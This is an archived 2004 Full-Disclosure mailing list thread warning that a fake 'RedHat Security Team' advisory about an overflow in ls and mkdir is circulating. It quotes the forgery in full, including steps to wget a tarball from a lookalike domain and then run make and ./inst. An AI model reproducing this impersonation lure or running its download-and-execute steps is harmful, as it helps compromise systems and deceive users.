| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20041025090153.GG97718@DAPCVA.da> From: var at deny-all.com (Vincent Archer) Subject: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote: > haha, that's pretty funny. If they were going to do something like that > it should have at least been in a rpm format. Considering you can put an executable script inside, if I remember right. > I'm hoping that this doesn't need to be said but if neither > "yum check-update || up2date -l" report anything then chances are there > are no "Official Fedora Updates" > > --Harry > > > > Hugo van der Kooij wrote: > >-----BEGIN PGP SIGNED MESSAGE----- > > > >Be advised. > > > >The message below is currently going around on internet. Being unsinged > >was the fist obvious issue. Not pointing to RPM updates, being in a > >different format and such were among the other reasong to suspect it. > > > >Message was send from 'University of Texas at Arlington'. > > > >I am sure none of you should be fooled by such a message but other might > >be. > > > >And while it lasts you may want to get the file for your own educational > >purposes. > > > >Hugo. > >- ---------- Forwarded message ---------- > >Date: Sun, 24 Oct 2004 17:22:20 -0500 > >From: RedHat Security Team <security@...hat.com> > >To: ***************** > >Subject: RedHat: Buffer Overflow in "ls" and "mkdir" > > > > > >[logo_rh_home.png] > > > >Original issue date: October 20, 2004 > >Last revised: October 20, 2004 > >Source: RedHat > > > >A complete revision history is at the end of this file. > > > >Dear RedHat user, > > > >Redhat found a vulnerability in fileutils (ls and mkdir), that could > >allow a remote attacker to execute arbitrary code with root privileges. > >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, > >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is > >known that *BSD and Solaris platforms are NOT affected. > > > >The RedHat Security Team strongly advises you to immediately apply the > >fileutils-1.0.6 patch. This is a critical-critical update that you must > >make by following these steps: > > > > * First download the patch from the Security RedHat mirror: wget > > www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz > > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz > > * cd fileutils-1.0.6.patch > > * make > > * ./inst > > > >Again, please apply this patch as soon as possible or you risk your > >system and others` to be compromised. > > > >Thank you for your prompt attention to this serious matter, > > > >RedHat Security Team. > > > >Copyright (C) 2004 Red Hat, Inc. All rights reserved. > > > > > >-----BEGIN PGP SIGNATURE----- > >Version: GnuPG v1.2.3 (GNU/Linux) > > > >iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7 > >OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo > >H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL > >fcdKycT5D9E= > >=/nEk > >-----END PGP SIGNATURE----- > > > >_______________________________________________ > >Full-Disclosure - We believe in it. > >Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html -- Vincent ARCHER varcher@...yall.com Tel : +33 (0)1 40 07 47 14 Fax : +33 (0)1 40 07 47 27 Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
Powered by blists - more mailing lists